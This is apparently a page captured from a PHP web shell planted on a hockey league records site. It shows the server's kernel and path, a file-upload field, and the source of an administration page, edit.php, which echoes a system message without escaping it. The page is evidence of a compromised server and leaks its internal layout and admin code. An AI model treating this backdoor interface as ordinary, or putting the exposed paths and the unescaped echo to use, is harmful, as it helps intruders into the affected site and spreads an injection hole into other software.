AlaK4X
Linux lhjmq-records 5.15.0-118-generic #128-Ubuntu SMP Fri Jul 5 09:28:59 UTC 2024 x86_64



Your IP : 3.128.201.71


Current Path : /var/www/lhjmq-records.qc.ca/public_html/administration/regis_equipes/
Upload File :
Current File : /var/www/lhjmq-records.qc.ca/public_html/administration/regis_equipes/edit.php

<?
//Modules information
$moduleclassid = "cdf9aee5d1a806f3fcc72250ecbfd76a";
$permission = 1;

//App settings
include("../../includes/applogger.php");
include("../../includes/appsettings.php");

//Load the standard includes
include("../includes/secur_isloggedin.php");
include("../includes/mysql_connect.php");
include("../includes/secur_accessverify.php");
?>
<HTML>
<HEAD>
<TITLE>Administration - www.lhjmq.qc.ca</TITLE>
<META http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<LINK rel="stylesheet" href="../css/base.css" type="text/css">
<LINK rel="stylesheet" href="../css/admintheme.css" type="text/css">
<LINK rel="stylesheet" href="../css/tablespecials.css" type="text/css">
<LINK href="../../css/links.css" rel="stylesheet" type="text/css">
<LINK href="../../css/table.css" rel="stylesheet" type="text/css">
<LINK href="../../css/tags.css" rel="stylesheet" type="text/css">
<LINK href="../../css/text.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY bgcolor="#BBBFCE" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> 
<TABLE width="100%" border="0" cellspacing="0" cellpadding="0"> 
	<TR> 
		<TD background="../images/scoreboard_top.gif"><IMG src="../images/spacer.gif" width="1" height="11"></TD> 
	</TR> 
	<TR> 
		<TD bgcolor="#E8E9F5" align="center"> 
			<table width="100%" border="0" cellspacing="0" cellpadding="0"> 
				<tr> 
					<td width="50%" rowspan="2" align="left" valign="middle" nowrap><strong><font size="+2">&nbsp;Livre du registre</font></strong></td> 
					<td align="right" nowrap><span class="blackText10px"><a href="../session/session_menu.php?currentmenu=info" class="lnkBase10px">Retour au menu principal</a></span></td> 
					<td width="50" align="right">&nbsp;</td> 
				</tr> 
				<tr> 
					<td align="right">&nbsp;</td> 
					<td>&nbsp;</td> 
				</tr> 
			</table> 
		</TD> 
	</TR> 
	<TR> 
		<TD background="../images/scoreboard_bottom.gif"><IMG src="../images/spacer.gif" width="1" height="10"></TD> 
	</TR> 
	<TR> 
		<TD><IMG src="../images/spacer.gif" width="1" height="4"></TD> 
	</TR> 
	<TR> 
		<TD> 
			<?php if(isset($sysmsg)){ ?> 
			<TABLE width="95%" border="0" align="center" cellpadding="0" cellspacing="0" class="outlinetab"> 
				<TR> 
					<TD bgcolor="#546085"> 
						<TABLE border="0" cellpadding="0" cellspacing="0"> 
							<TR> 
								<TD width="8" bgcolor="#546085"><IMG src="../images/spacer.gif" width="8" height="1"></TD> 
								<TD height="15" nowrap bgcolor="#546085"><SPAN class="orangeText9px"><STRONG> Message du syst&egrave;me</STRONG></SPAN></TD> 
							</TR> 
						</TABLE> 
					</TD> 
				</TR> 
				<TR align="center"> 
					<TD align="left" bgcolor="#FFFFFF" class="blackText10px" style="padding: 5px"> 
						<table width="100%" cellpadding=1 cellspacing=1> 
							<tr> 
								<td align="left" nowrap class="blackText11px"><?php echo $sysmsg; ?></td> 
							</tr> 
						</table> 
					</TD> 
				</TR> 
				<TR> 
					<TD bgcolor="#FFFFFF"><IMG src="../images/spacer.gif" width="1" height="8"></TD> 
				</TR> 
			</TABLE> 
			<br> 
			<?php } ?> 
		</TD> 
	</TR> 
</TABLE> 
</BODY>
</HTML>
<?
//Load the standard includes footers
include("../includes/mysql_cleanup.php");
?>